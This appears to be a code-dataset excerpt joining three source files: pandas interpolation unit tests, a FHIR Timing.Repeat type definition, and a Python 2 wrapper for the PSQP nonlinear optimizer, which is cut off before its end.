new_index = ser.index.union(Index([49.25, 49.5, 49.75, 50.25, 50.5,
50.75]))
interp_s = ser.reindex(new_index).interpolate(method='pchip')
# does not blow up, GH5977
interp_s[49:51]
def test_interpolate_akima(self):
tm._skip_if_no_scipy()
_skip_if_no_akima()
ser = Series([10, 11, 12, 13])
expected = Series([11.00, 11.25, 11.50, 11.75,
12.00, 12.25, 12.50, 12.75, 13.00],
index=Index([1.0, 1.25, 1.5, 1.75,
2.0, 2.25, 2.5, 2.75, 3.0]))
# interpolate at new_index
new_index = ser.index.union(Index([1.25, 1.5, 1.75, 2.25, 2.5, 2.75]))
interp_s = ser.reindex(new_index).interpolate(method='akima')
assert_series_equal(interp_s[1:3], expected)
def test_interpolate_piecewise_polynomial(self):
tm._skip_if_no_scipy()
ser = Series([10, 11, 12, 13])
expected = Series([11.00, 11.25, 11.50, 11.75,
12.00, 12.25, 12.50, 12.75, 13.00],
index=Index([1.0, 1.25, 1.5, 1.75,
2.0, 2.25, 2.5, 2.75, 3.0]))
# interpolate at new_index
new_index = ser.index.union(Index([1.25, 1.5, 1.75, 2.25, 2.5, 2.75]))
interp_s = ser.reindex(new_index).interpolate(
method='piecewise_polynomial')
assert_series_equal(interp_s[1:3], expected)
def test_interpolate_from_derivatives(self):
tm._skip_if_no_scipy()
ser = Series([10, 11, 12, 13])
expected = Series([11.00, 11.25, 11.50, 11.75,
12.00, 12.25, 12.50, 12.75, 13.00],
index=Index([1.0, 1.25, 1.5, 1.75,
2.0, 2.25, 2.5, 2.75, 3.0]))
# interpolate at new_index
new_index = ser.index.union(Index([1.25, 1.5, 1.75, 2.25, 2.5, 2.75]))
interp_s = ser.reindex(new_index).interpolate(
method='from_derivatives')
assert_series_equal(interp_s[1:3], expected)
def test_interpolate_corners(self):
s = Series([np.nan, np.nan])
assert_series_equal(s.interpolate(), s)
s = Series([]).interpolate()
assert_series_equal(s.interpolate(), s)
tm._skip_if_no_scipy()
s = Series([np.nan, np.nan])
assert_series_equal(s.interpolate(method='polynomial', order=1), s)
s = Series([]).interpolate()
assert_series_equal(s.interpolate(method='polynomial', order=1), s)
def test_interpolate_index_values(self):
s = Series(np.nan, index=np.sort(np.random.rand(30)))
s[::3] = np.random.randn(10)
vals = s.index.values.astype(float)
result = s.interpolate(method='index')
expected = s.copy()
bad = isnull(expected.values)
good = ~bad
expected = Series(np.interp(vals[bad], vals[good],
s.values[good]),
index=s.index[bad])
assert_series_equal(result[bad], expected)
# 'values' is synonymous with 'index' for the method kwarg
other_result = s.interpolate(method='values')
assert_series_equal(other_result, result)
assert_series_equal(other_result[bad], expected)
def test_interpolate_non_ts(self):
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
with tm.assertRaises(ValueError):
s.interpolate(method='time')
# New interpolation tests
def test_nan_interpolate(self):
s = Series([0, 1, np.nan, 3])
result = s.interpolate()
expected = Series([0., 1., 2., 3.])
assert_series_equal(result, expected)
tm._skip_if_no_scipy()
result = s.interpolate(method='polynomial', order=1)
assert_series_equal(result, expected)
def test_nan_irregular_index(self):
s = Series([1, 2, np.nan, 4], index=[1, 3, 5, 9])
result = s.interpolate()
expected = Series([1., 2., 3., 4.], index=[1, 3, 5, 9])
assert_series_equal(result, expected)
def test_nan_str_index(self):
s = Series([0, 1, 2, np.nan], index=list('abcd'))
result = s.interpolate()
expected = Series([0., 1., 2., 2.], index=list('abcd'))
assert_series_equal(result, expected)
def test_interp_quad(self):
tm._skip_if_no_scipy()
sq = Series([1, 4, np.nan, 16], index=[1, 2, 3, 4])
result = sq.interpolate(method='quadratic')
expected = Series([1., 4., 9., 16.], index=[1, 2, 3, 4])
assert_series_equal(result, expected)
def test_interp_scipy_basic(self):
tm._skip_if_no_scipy()
s = Series([1, 3, np.nan, 12, np.nan, 25])
# slinear
expected = Series([1., 3., 7.5, 12., 18.5, 25.])
result = s.interpolate(method='slinear')
assert_series_equal(result, expected)
result = s.interpolate(method='slinear', downcast='infer')
assert_series_equal(result, expected)
# nearest
expected = Series([1, 3, 3, 12, 12, 25])
result = s.interpolate(method='nearest')
assert_series_equal(result, expected.astype('float'))
result = s.interpolate(method='nearest', downcast='infer')
assert_series_equal(result, expected)
# zero
expected = Series([1, 3, 3, 12, 12, 25])
result = s.interpolate(method='zero')
assert_series_equal(result, expected.astype('float'))
result = s.interpolate(method='zero', downcast='infer')
assert_series_equal(result, expected)
# quadratic
# GH #15662.
# new cubic and quadratic interpolation algorithms from scipy 0.19.0.
# previously `splmake` was used. See scipy/scipy#6710
if _is_scipy_ge_0190:
expected = Series([1, 3., 6.823529, 12., 18.058824, 25.])
else:
expected = Series([1, 3., 6.769231, 12., 18.230769, 25.])
result = s.interpolate(method='quadratic')
assert_series_equal(result, expected)
result = s.interpolate(method='quadratic', downcast='infer')
assert_series_equal(result, expected)
# cubic
expected = Series([1., 3., 6.8, 12., 18.2, 25.])
result = s.interpolate(method='cubic')
assert_series_equal(result, expected)
def test_interp_limit(self):
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
expected = Series([1., 3., 5., 7., np.nan, 11.])
result = s.interpolate(method='linear', limit=2)
assert_series_equal(result, expected)
# GH 9217, make sure limit is an int and greater than 0
methods = ['linear', 'time', 'index', 'values', 'nearest', 'zero',
'slinear', 'quadratic', 'cubic', 'barycentric', 'krogh',
'polynomial', 'spline', 'piecewise_polynomial', None,
'from_derivatives', 'pchip', 'akima']
s = pd.Series([1, 2, np.nan, np.nan, 5])
for limit in [-1, 0, 1., 2.]:
for method in methods:
with tm.assertRaises(ValueError):
s.interpolate(limit=limit, method=method)
def test_interp_limit_forward(self):
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
# Provide 'forward' (the default) explicitly here.
expected = Series([1., 3., 5., 7., np.nan, 11.])
result = s.interpolate(method='linear', limit=2,
limit_direction='forward')
assert_series_equal(result, expected)
result = s.interpolate(method='linear', limit=2,
limit_direction='FORWARD')
assert_series_equal(result, expected)
def test_interp_limit_bad_direction(self):
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
self.assertRaises(ValueError, s.interpolate, method='linear', limit=2,
limit_direction='abc')
# raises an error even if no limit is specified.
self.assertRaises(ValueError, s.interpolate, method='linear',
limit_direction='abc')
def test_interp_limit_direction(self):
# These tests are for issue #9218 -- fill NaNs in both directions.
s = Series([1, 3, np.nan, np.nan, np.nan, 11])
expected = Series([1., 3., np.nan, 7., 9., 11.])
result = s.interpolate(method='linear', limit=2,
limit_direction='backward')
assert_series_equal(result, expected)
expected = Series([1., 3., 5., np.nan, 9., 11.])
result = s.interpolate(method='linear', limit=1,
limit_direction='both')
assert_series_equal(result, expected)
# Check that this works on a longer series of nans.
s = Series([1, 3, np.nan, np.nan, np.nan, 7, 9, np.nan, np.nan, 12,
np.nan])
expected = Series([1., 3., 4., 5., 6., 7., 9., 10., 11., 12., 12.])
result = s.interpolate(method='linear', limit=2,
limit_direction='both')
assert_series_equal(result, expected)
expected = Series([1., 3., 4., np.nan, 6., 7., 9., 10., 11., 12., 12.])
result = s.interpolate(method='linear', limit=1,
limit_direction='both')
assert_series_equal(result, expected)
def test_interp_limit_to_ends(self):
# These test are for issue #10420 -- flow back to beginning.
s = Series([np.nan, np.nan, 5, 7, 9, np.nan])
expected = Series([5., 5., 5., 7., 9., np.nan])
result = s.interpolate(method='linear', limit=2,
limit_direction='backward')
assert_series_equal(result, expected)
expected = Series([5., 5., 5., 7., 9., 9.])
result = s.interpolate(method='linear', limit=2,
limit_direction='both')
assert_series_equal(result, expected)
def test_interp_limit_before_ends(self):
# These test are for issue #11115 -- limit ends properly.
s = Series([np.nan, np.nan, 5, 7, np.nan, np.nan])
expected = Series([np.nan, np.nan, 5., 7., 7., np.nan])
result = s.interpolate(method='linear', limit=1,
limit_direction='forward')
assert_series_equal(result, expected)
expected = Series([np.nan, 5., 5., 7., np.nan, np.nan])
result = s.interpolate(method='linear', limit=1,
limit_direction='backward')
assert_series_equal(result, expected)
expected = Series([np.nan, 5., 5., 7., 7., np.nan])
result = s.interpolate(method='linear', limit=1,
limit_direction='both')
assert_series_equal(result, expected)
def test_interp_all_good(self):
# scipy
tm._skip_if_no_scipy()
s = Series([1, 2, 3])
result = s.interpolate(method='polynomial', order=1)
assert_series_equal(result, s)
# non-scipy
result = s.interpolate()
assert_series_equal(result, s)
def test_interp_multiIndex(self):
idx = MultiIndex.from_tuples([(0, 'a'), (1, 'b'), (2, 'c')])
s = Series([1, 2, np.nan], index=idx)
expected = s.copy()
expected.loc[2] = 2
result = s.interpolate()
assert_series_equal(result, expected)
tm._skip_if_no_scipy()
with tm.assertRaises(ValueError):
s.interpolate(method='polynomial', order=1)
def test_interp_nonmono_raise(self):
tm._skip_if_no_scipy()
s = Series([1, np.nan, 3], index=[0, 2, 1])
with tm.assertRaises(ValueError):
s.interpolate(method='krogh')
def test_interp_datetime64(self):
tm._skip_if_no_scipy()
df = Series([1, np.nan, 3], index=date_range('1/1/2000', periods=3))
result = df.interpolate(method='nearest')
expected = Series([1., 1., 3.],
index=date_range('1/1/2000', periods=3))
assert_series_equal(result, expected)
def test_interp_limit_no_nans(self):
# GH 7173
s = pd.Series([1., 2., 3.])
result = s.interpolate(limit=1)
expected = s
assert_series_equal(result, expected)
def test_no_order(self):
tm._skip_if_no_scipy()
s = Series([0, 1, np.nan, 3])
with tm.assertRaises(ValueError):
s.interpolate(method='polynomial')
with tm.assertRaises(ValueError):
s.interpolate(method='spline')
def test_spline(self):
tm._skip_if_no_scipy()
s = Series([1, 2, np.nan, 4, 5, np.nan, 7])
result = s.interpolate(method='spline', order=1)
expected = Series([1., 2., 3., 4., 5., 6., 7.])
assert_series_equal(result, expected)
def test_spline_extrapolate(self):
tm.skip_if_no_package(
'scipy', min_version='0.15',
app='setting ext on scipy.interpolate.UnivariateSpline')
s = Series([1, 2, 3, 4, np.nan, 6, np.nan])
result3 = s.interpolate(method='spline', order=1, ext=3)
expected3 = Series([1., 2., 3., 4., 5., 6., 6.])
assert_series_equal(result3, expected3)
result1 = s.interpolate(method='spline', order=1, ext=0)
expected1 = Series([1., 2., 3., 4., 5., 6., 7.])
assert_series_equal(result1, expected1)
def test_spline_smooth(self):
tm._skip_if_no_scipy()
s = Series([1, 2, np.nan, 4, 5.1, np.nan, 7])
self.assertNotEqual(s.interpolate(method='spline', order=3, s=0)[5],
s.interpolate(method='spline', order=3)[5])
def test_spline_interpolation(self):
tm._skip_if_no_scipy()
s = Series(np.arange(10) ** 2)
s[np.random.randint(0, 9, 3)] = np.nan
result1 = s.interpolate(method='spline', order=1)
expected1 = s.interpolate(method='spline', order=1)
assert_series_equal(result1, expected1)
# GH #10633
def test_spline_error(self):
tm._skip_if_no_scipy()
s = pd.Series(np.arange(10) ** 2)
s[np.random.randint(0, 9, 3)] = np.nan
with tm.assertRaises(ValueError):
s.interpolate(method='spline')
with tm.assertRaises(ValueError):
s.interpolate(method='spline', order=0)
def test_interp_timedelta64(self):
# GH 6424
df = Series([1, np.nan, 3],
index=pd.to_timedelta([1, 2, 3]))
result = df.interpolate(method='time')
expected = Series([1., 2., 3.],
index=pd.to_timedelta([1, 2, 3]))
assert_series_equal(result, expected)
# test for non uniform spacing
df = Series([1, np.nan, 3],
index=pd.to_timedelta([1, 2, 4]))
result = df.interpolate(method='time')
expected = Series([1., 1.666667, 3.],
index=pd.to_timedelta([1, 2, 4]))
assert_series_equal(result, expected)
def test_series_interpolate_method_values(self):
# #1646
ts = _simple_ts('1/1/2000', '1/20/2000')
ts[::2] = np.nan
result = ts.interpolate(method='values')
exp = ts.interpolate()
assert_series_equal(result, exp)
def test_series_interpolate_intraday(self):
# #1698
index = pd.date_range('1/1/2012', periods=4, freq='12D')
ts = pd.Series([0, 12, 24, 36], index)
new_index = index.append(index + pd.DateOffset(days=1)).sort_values()
exp = ts.reindex(new_index).interpolate(method='time')
index = pd.date_range('1/1/2012', periods=4, freq='12H')
ts = pd.Series([0, 12, 24, 36], index)
new_index = index.append(index + pd.DateOffset(hours=1)).sort_values()
result = ts.reindex(new_index).interpolate(method='time')
self.assert_numpy_array_equal(result.values, exp.values)
| 38.693405
| 79
| 0.559105
|
d309f3ef579b4a8841bbb440e44e17d881833e60
| 7,230
|
py
|
Python
|
src/fhir_types/FHIR_Timing_Repeat.py
|
anthem-ai/fhir-types
|
42348655fb3a9b3f131b911d6bc0782da8c14ce4
|
[
"Apache-2.0"
] | 2
|
2022-02-03T00:51:30.000Z
|
2022-02-03T18:42:43.000Z
|
src/fhir_types/FHIR_Timing_Repeat.py
|
anthem-ai/fhir-types
|
42348655fb3a9b3f131b911d6bc0782da8c14ce4
|
[
"Apache-2.0"
] | null | null | null |
src/fhir_types/FHIR_Timing_Repeat.py
|
anthem-ai/fhir-types
|
42348655fb3a9b3f131b911d6bc0782da8c14ce4
|
[
"Apache-2.0"
] | null | null | null |
from typing import Any, List, Literal, TypedDict
from .FHIR_code import FHIR_code
from .FHIR_decimal import FHIR_decimal
from .FHIR_Duration import FHIR_Duration
from .FHIR_Element import FHIR_Element
from .FHIR_Period import FHIR_Period
from .FHIR_positiveInt import FHIR_positiveInt
from .FHIR_Range import FHIR_Range
from .FHIR_string import FHIR_string
from .FHIR_time import FHIR_time
from .FHIR_unsignedInt import FHIR_unsignedInt
# Specifies an event that may occur multiple times. Timing schedules are used to record when things are planned, expected or requested to occur. The most common usage is in dosage instructions for medications. They are also used when planning care of various kinds, and may be used for reporting the schedule to which past regular activities were carried out.
FHIR_Timing_Repeat = TypedDict(
"FHIR_Timing_Repeat",
{
# Unique id for the element within a resource (for internal references). This may be any string value that does not contain spaces.
"id": FHIR_string,
# May be used to represent additional information that is not part of the basic definition of the element. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension.
"extension": List[Any],
# May be used to represent additional information that is not part of the basic definition of the element and that modifies the understanding of the element in which it is contained and/or the understanding of the containing element's descendants. Usually modifier elements provide negation or qualification. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. Applications processing a resource are required to check for modifier extensions.Modifier extensions SHALL NOT change the meaning of any elements on Resource or DomainResource (including cannot change the meaning of modifierExtension itself).
"modifierExtension": List[Any],
# Either a duration for the length of the timing schedule, a range of possible length, or outer bounds for start and/or end limits of the timing schedule.
"boundsDuration": FHIR_Duration,
# Either a duration for the length of the timing schedule, a range of possible length, or outer bounds for start and/or end limits of the timing schedule.
"boundsRange": FHIR_Range,
# Either a duration for the length of the timing schedule, a range of possible length, or outer bounds for start and/or end limits of the timing schedule.
"boundsPeriod": FHIR_Period,
# A total count of the desired number of repetitions across the duration of the entire timing specification. If countMax is present, this element indicates the lower bound of the allowed range of count values.
"count": FHIR_positiveInt,
# Extensions for count
"_count": FHIR_Element,
# If present, indicates that the count is a range - so to perform the action between [count] and [countMax] times.
"countMax": FHIR_positiveInt,
# Extensions for countMax
"_countMax": FHIR_Element,
# How long this thing happens for when it happens. If durationMax is present, this element indicates the lower bound of the allowed range of the duration.
"duration": FHIR_decimal,
# Extensions for duration
"_duration": FHIR_Element,
# If present, indicates that the duration is a range - so to perform the action between [duration] and [durationMax] time length.
"durationMax": FHIR_decimal,
# Extensions for durationMax
"_durationMax": FHIR_Element,
# The units of time for the duration, in UCUM units.
"durationUnit": Literal["s", "min", "h", "d", "wk", "mo", "a"],
# Extensions for durationUnit
"_durationUnit": FHIR_Element,
# The number of times to repeat the action within the specified period. If frequencyMax is present, this element indicates the lower bound of the allowed range of the frequency.
"frequency": FHIR_positiveInt,
# Extensions for frequency
"_frequency": FHIR_Element,
# If present, indicates that the frequency is a range - so to repeat between [frequency] and [frequencyMax] times within the period or period range.
"frequencyMax": FHIR_positiveInt,
# Extensions for frequencyMax
"_frequencyMax": FHIR_Element,
# Indicates the duration of time over which repetitions are to occur; e.g. to express "3 times per day", 3 would be the frequency and "1 day" would be the period. If periodMax is present, this element indicates the lower bound of the allowed range of the period length.
"period": FHIR_decimal,
# Extensions for period
"_period": FHIR_Element,
# If present, indicates that the period is a range from [period] to [periodMax], allowing expressing concepts such as "do this once every 3-5 days.
"periodMax": FHIR_decimal,
# Extensions for periodMax
"_periodMax": FHIR_Element,
# The units of time for the period in UCUM units.
"periodUnit": Literal["s", "min", "h", "d", "wk", "mo", "a"],
# Extensions for periodUnit
"_periodUnit": FHIR_Element,
# If one or more days of week is provided, then the action happens only on the specified day(s).
"dayOfWeek": List[FHIR_code],
# Extensions for dayOfWeek
"_dayOfWeek": List[FHIR_Element],
# Specified time of day for action to take place.
"timeOfDay": List[FHIR_time],
# Extensions for timeOfDay
"_timeOfDay": List[FHIR_Element],
# An approximate time period during the day, potentially linked to an event of daily living that indicates when the action should occur.
"when": List[
Literal[
"MORN",
"MORN.early",
"MORN.late",
"NOON",
"AFT",
"AFT.early",
"AFT.late",
"EVE",
"EVE.early",
"EVE.late",
"NIGHT",
"PHS",
"HS",
"WAKE",
"C",
"CM",
"CD",
"CV",
"AC",
"ACM",
"ACD",
"ACV",
"PC",
"PCM",
"PCD",
"PCV",
]
],
# Extensions for when
"_when": List[FHIR_Element],
# The number of minutes from the event. If the event code does not indicate whether the minutes is before or after the event, then the offset is assumed to be after the event.
"offset": FHIR_unsignedInt,
# Extensions for offset
"_offset": FHIR_Element,
},
total=False,
)
| 61.271186
| 836
| 0.670954
|
be16099c5e79082522272f3940e0a030a8e3765a
| 16,666
|
py
|
Python
|
docker/optimization/pyOpt/tags/v1.2.0/pyOpt/pyPSQP/pyPSQP.py
|
liujiamingustc/phd
|
4f815a738abad43531d02ac66f5bd0d9a1def52a
|
[
"Apache-2.0"
] | 3
|
2021-01-06T03:01:18.000Z
|
2022-03-21T03:02:55.000Z
|
docker/optimization/pyOpt/tags/v1.2.0/pyOpt/pyPSQP/pyPSQP.py
|
liujiamingustc/phd
|
4f815a738abad43531d02ac66f5bd0d9a1def52a
|
[
"Apache-2.0"
] | null | null | null |
docker/optimization/pyOpt/tags/v1.2.0/pyOpt/pyPSQP/pyPSQP.py
|
liujiamingustc/phd
|
4f815a738abad43531d02ac66f5bd0d9a1def52a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''
pyPSQP - A Python pyOpt interface to PSQP.
Copyright (c) 2008-2014 by pyOpt Developers
All rights reserved.
Revision: 1.1 $Date: 31/07/2014 21:00$
Tested on:
---------
Win32 with g77
Linux with pathf95
Linux with gfortran
Linux with g77
Developers:
-----------
- Dr. Ruben E. Perez (RP)
History
-------
v. 1.0 - Initial Class Creation (RP, 2010)
v. 1.1 - Unconstrained Problems Support (RP, 2014)
'''
__version__ = '$Revision: $'
'''
To Do:
-
'''
# =============================================================================
# PSQP Library
# =============================================================================
try:
import psqp
except:
raise ImportError('PSQP shared library failed to import')
#end
# =============================================================================
# Standard Python modules
# =============================================================================
import os, sys
import copy, time
# =============================================================================
# External Python modules
# =============================================================================
import numpy
# =============================================================================
# Extension modules
# =============================================================================
from pyOpt import Optimizer
from pyOpt import Gradient
# =============================================================================
# Misc Definitions
# =============================================================================
inf = 10.E+20 # define a value for infinity
# =============================================================================
eps = 1.0 # define a value for machine precision
while ((eps/2.0 + 1.0) > 1.0):
eps = eps/2.0
#end
eps = 2.0*eps
#eps = math.ldexp(1,-52)
# =============================================================================
# PSQP Optimizer Class
# =============================================================================
class PSQP(Optimizer):
'''
PSQP Optimizer Class - Inherited from Optimizer Abstract Class
'''
def __init__(self, pll_type=None, *args, **kwargs):
'''
PSQP Optimizer Class Initialization
**Keyword arguments:**
- pll_type -> STR: Parallel Implementation (None, 'POA'-Parallel Objective Analysis), *Default* = None
Documentation last updated: Feb. 16, 2010 - Peter W. Jansen
'''
#
if (pll_type == None):
self.poa = False
elif (pll_type.upper() == 'POA'):
self.poa = True
else:
raise ValueError("pll_type must be either None or 'POA'")
#end
#
name = 'PSQP'
category = 'Local Optimizer'
def_opts = {
'XMAX':[float,1e16], # Maximum Stepsize
'TOLX':[float,1e-16], # Variable Change Tolerance
'TOLC':[float,1e-6], # Constraint Violation Tolerance
'TOLG':[float,1e-6], # Lagrangian Gradient Tolerance
'RPF':[float,1e-4], # Penalty Coefficient
'MIT':[int,1000], # Maximum Number of Iterations
'MFV':[int,2000], # Maximum Number of Function Evaluations
'MET':[int,2], # Variable Metric Update (1 - BFGS, 2 - Hoshino)
'MEC':[int,2], # Negative Curvature Correction (1 - None, 2 - Powell's Correction)
'IPRINT':[int,2], # Output Level (0 - None, 1 - Final, 2 - Iter)
'IOUT':[int,6], # Output Unit Number
'IFILE':[str,'PSQP.out'], # Output File Name
}
informs = {
1 : 'Change in design variable was less than or equal to tolerance',
2 : 'Change in objective function was less than or equal to tolerance',
3 : 'Objective function less than or equal to tolerance',
4 : 'Maximum constraint value is less than or equal to tolerance',
11 : 'Maximum number of iterations exceeded',
12 : 'Maximum number of function evaluations exceeded',
13 : 'Maximum number of gradient evaluations exceeded',
-6 : 'Termination criterion not satisfied, but obtained point is acceptable',
#<0 : 'Method failed',
}
Optimizer.__init__(self, name, category, def_opts, informs, *args, **kwargs)
def __solve__(self, opt_problem={}, sens_type='FD', store_sol=True, store_hst=False, hot_start=False, disp_opts=False, sens_mode='', sens_step={}, *args, **kwargs):
'''
Run Optimizer (Optimize Routine)
**Keyword arguments:**
- opt_problem -> INST: Optimization instance
- sens_type -> STR/FUNC: Gradient type, *Default* = 'FD'
- store_sol -> BOOL: Store solution in Optimization class flag, *Default* = True
- disp_opts -> BOOL: Flag to display options in solution text, *Default* = False
- store_hst -> BOOL/STR: Flag/filename to store optimization history, *Default* = False
- hot_start -> BOOL/STR: Flag/filename to read optimization history, *Default* = False
- sens_mode -> STR: Flag for parallel gradient calculation, *Default* = ''
- sens_step -> FLOAT: Sensitivity setp size, *Default* = {} [corresponds to 1e-6 (FD), 1e-20(CS)]
Additional arguments and keyword arguments are passed to the objective function call.
Documentation last updated: February. 2, 2011 - Ruben E. Perez
'''
#
if ((self.poa) and (sens_mode.lower() == 'pgc')):
raise NotImplementedError("pyPSQP - Current implementation only allows single level parallelization, either 'POA' or 'pgc'")
#end
if self.poa or (sens_mode.lower() == 'pgc'):
try:
import mpi4py
from mpi4py import MPI
except ImportError:
print 'pyPSQP: Parallel objective Function Analysis requires mpi4py'
#end
comm = MPI.COMM_WORLD
nproc = comm.Get_size()
if (mpi4py.__version__[0] == '0'):
Bcast = comm.Bcast
elif (mpi4py.__version__[0] == '1'):
Bcast = comm.bcast
#end
self.pll = True
self.myrank = comm.Get_rank()
else:
self.pll = False
self.myrank = 0
#end
myrank = self.myrank
#
def_fname = self.options['IFILE'][1].split('.')[0]
hos_file, log_file, tmp_file = self._setHistory(opt_problem.name, store_hst, hot_start, def_fname)
#
gradient = Gradient(opt_problem, sens_type, sens_mode, sens_step, *args, **kwargs)
#======================================================================
# PSQP - Objective/Constraint Values Storage
#======================================================================
def eval(x):
# Variables Groups Handling
if opt_problem.use_groups:
xg = {}
for group in group_ids.keys():
if (group_ids[group][1]-group_ids[group][0] == 1):
xg[group] = x[group_ids[group][0]]
else:
xg[group] = x[group_ids[group][0]:group_ids[group][1]]
#end
#end
xn = xg
else:
xn = x
#end
# Flush Output Files
self.flushFiles()
# Evaluate User Function (Real Valued)
fail = 0
f = []
g = []
if (myrank == 0):
if self.h_start:
[vals,hist_end] = hos_file.read(ident=['obj', 'con', 'fail'])
if hist_end:
self.h_start = False
hos_file.close()
else:
[f,g,fail] = [vals['obj'][0][0],vals['con'][0],int(vals['fail'][0][0])]
#end
#end
#end
if self.pll:
self.h_start = Bcast(self.h_start,root=0)
#end
if self.h_start and self.pll:
[f,g,fail] = Bcast([f,g,fail],root=0)
elif not self.h_start:
[f,g,fail] = opt_problem.obj_fun(xn, *args, **kwargs)
#end
# Store History
if (myrank == 0):
if self.sto_hst:
log_file.write(x,'x')
log_file.write(f,'obj')
log_file.write(g,'con')
log_file.write(fail,'fail')
#end
#end
# Objective Assigment
if isinstance(f,float):
f = [f]
#end
for i in xrange(len(opt_problem._objectives.keys())):
if isinstance(f[i],complex):
ff[i] = f[i].astype(float)
else:
ff[i] = f[i]
#end
#end
# Constraints Assigment
i = 0
for j in xrange(len(opt_problem._constraints.keys())):
if isinstance(g[j],complex):
gg[i] = g[j].astype(float)
else:
gg[i] = g[j]
#end
i += 1
#end
# Gradients
if self.h_start:
dff = []
dgg = []
if (myrank == 0):
[vals,hist_end] = hos_file.read(ident=['grad_obj','grad_con'])
if hist_end:
self.h_start = False
hos_file.close()
else:
dff = vals['grad_obj'][0].reshape((len(opt_problem._objectives.keys()),len(opt_problem._variables.keys())))
dgg = vals['grad_con'][0].reshape((len(opt_problem._constraints.keys()),len(opt_problem._variables.keys())))
#end
#end
if self.pll:
self.h_start = Bcast(self.h_start,root=0)
#end
if self.h_start and self.pll:
[dff,dgg] = Bcast([dff,dgg],root=0)
#end
#end
if not self.h_start:
#
dff,dgg = gradient.getGrad(x, group_ids, f, g, *args, **kwargs)
#end
# Store History
if self.sto_hst and (myrank == 0):
log_file.write(dff,'grad_obj')
log_file.write(dgg,'grad_con')
#end
# Store
self.stored_data['x'] = copy.copy(x)
self.stored_data['f'] = copy.copy(ff)
self.stored_data['g'] = copy.copy(gg)
self.stored_data['df'] = copy.copy(dff)
self.stored_data['dg'] = copy.copy(dgg)
return
#======================================================================
# PSQP - Objective Values Function
#======================================================================
def pobj(n,x,f):
if ((self.stored_data['x'] != x).any()):
eval(x)
#end
ff = self.stored_data['f']
return ff[0]
#======================================================================
# PSQP - Constraint Values Function
#======================================================================
def pcon(n,k,x,g):
if ((self.stored_data['x'] != x).any()):
eval(x)
#end
gg = self.stored_data['g']
return gg[k-1]
#======================================================================
# PSQP - Objective Gradients Function
#======================================================================
def pdobj(n,x,df):
if ((self.stored_data['x'] != x).any()):
eval(x)
#end
df = self.stored_data['df']
return df[0]
#======================================================================
# PSQP - Constraint Gradients Function
#======================================================================
def pdcon(n,k,x,dg):
if ((self.stored_data['x'] != x).any()):
eval(x)
#end
dg = self.stored_data['dg']
return dg[k-1]
# Variables Handling
nvar = len(opt_problem._variables.keys())
xl = []
xu = []
xi = []
xx = []
for key in opt_problem._variables.keys():
xl.append(opt_problem._variables[key].lower)
xu.append(opt_problem._variables[key].upper)
xi.append(3)
xx.append(opt_problem._variables[key].value)
#end
xl = numpy.array(xl)
xu = numpy.array(xu)
xi = numpy.array(xi)
xx = numpy.array(xx)
# Variables Groups Handling
group_ids = {}
if opt_problem.use_groups:
k = 0
for key in opt_problem._vargroups.keys():
group_len = len(opt_problem._vargroups[key]['ids'])
group_ids[opt_problem._vargroups[key]['name']] = [k,k+group_len]
k += group_len
#end
#end
# Constraints Handling
ncon = len(opt_problem._constraints.keys())
if ncon > 0:
gi = []
gg = []
for key in opt_problem._constraints.keys():
if opt_problem._constraints[key].type == 'e':
gi.append(5)
elif opt_problem._constraints[key].type == 'i':
gi.append(2)
#end
gg.append(opt_problem._constraints[key].value)
#end
gg.append(0.0)
gl = numpy.zeros([ncon], numpy.float)
gu = numpy.zeros([ncon], numpy.float)
gi = numpy.array(gi, numpy.float)
gg = numpy.array(gg, numpy.float)
else:
gl = numpy.array([0], numpy.float)
gu = numpy.array([0], numpy.float)
gi = numpy.array([0], numpy.float)
gg = numpy.array([0], numpy.float)
#end
# Objective Handling
objfunc = opt_problem.obj_fun
nobj = len(opt_problem._objectives.keys())
ff = []
for key in opt_problem._objectives.keys():
ff.append(opt_problem._objectives[key].value)
#end
ff = numpy.array(ff, numpy.float)
# Setup argument list values
nf = numpy.array([nvar], numpy.int)
nc = numpy.array([ncon], numpy.int)
mit = numpy.array([self.options['MIT'][1]], numpy.int)
mfv = numpy.array([self.options['MFV'][1]], numpy.int)
met = numpy.array([self.options['MET'][1]], numpy.int)
mec = numpy.array([self.options['MEC'][1]], numpy.int)
xmax = numpy.array([self.options['XMAX'][1]], numpy.float)
tolx = numpy.array([self.options['TOLX'][1]], numpy.float)
tolc = numpy.array([self.options['TOLC'][1]], numpy.float)
tolg = numpy.array([self.options['TOLG'][1]], numpy.float)
rpf = numpy.array([self.options['RPF'][1]], numpy.float)
gmax = numpy.array([0], numpy.float)
cmax = numpy.array([0], numpy.float)
if (myrank == 0):
if (self.options['IPRINT'][1] <= 2):
iprint = numpy.array([self.options['IPRINT'][1]], numpy.int)
else:
raise IOError('Incorrect Output Level Setting')
#end
else:
iprint = numpy.array([0], numpy.int)
#end
iout = numpy.array([self.options['IOUT'][1]], numpy.int)
ifile = self.options['IFILE'][1]
if (myrank == 0):
if (iprint != 0):
if os.path.isfile(ifile):
os.remove(ifile)
#end
#end
#end
iterm = numpy.array([0], numpy.int)
# Storage Arrays
self.stored_data = {}
self.stored_data['x'] = {} #numpy.zeros([nvar],float)
self.stored_data['f'] = {} #numpy.zeros([nobj],float)
self.stored_data['g'] = {} #numpy.zeros([ncon],float)
self.stored_data['df'] = {} #numpy.zeros([nvar],float)
self.stored_data['dg'] = {} #numpy.zeros([ncon,nvar],float)
# Run PSQP
t0 = time.time()
psqp.psqp_wrap(nf,nc,xx,xi,xl,xu,gg,gi,gl,gu,mit,mfv,
met,mec,xmax,tolx,tolc,tolg,rpf,ff,gmax,cmax,
iprint,iout,ifile,iterm,pobj,pdobj,pcon,pdcon)
sol_time = time.time() - t0
if (myrank == 0):
if self.sto_hst:
log_file.close()
if tmp_file:
hos_file.close()
name = hos_file.filename
os.remove(name+'.cue')
os.remove(name+'.bin')
os.rename(name+'_tmp.cue',name+'.cue')
os.rename(name+'_tmp.bin',name+'.bin')
#end
#end
#end
# Store Results
sol_inform = {}
sol_inform['value'] = iterm[0]
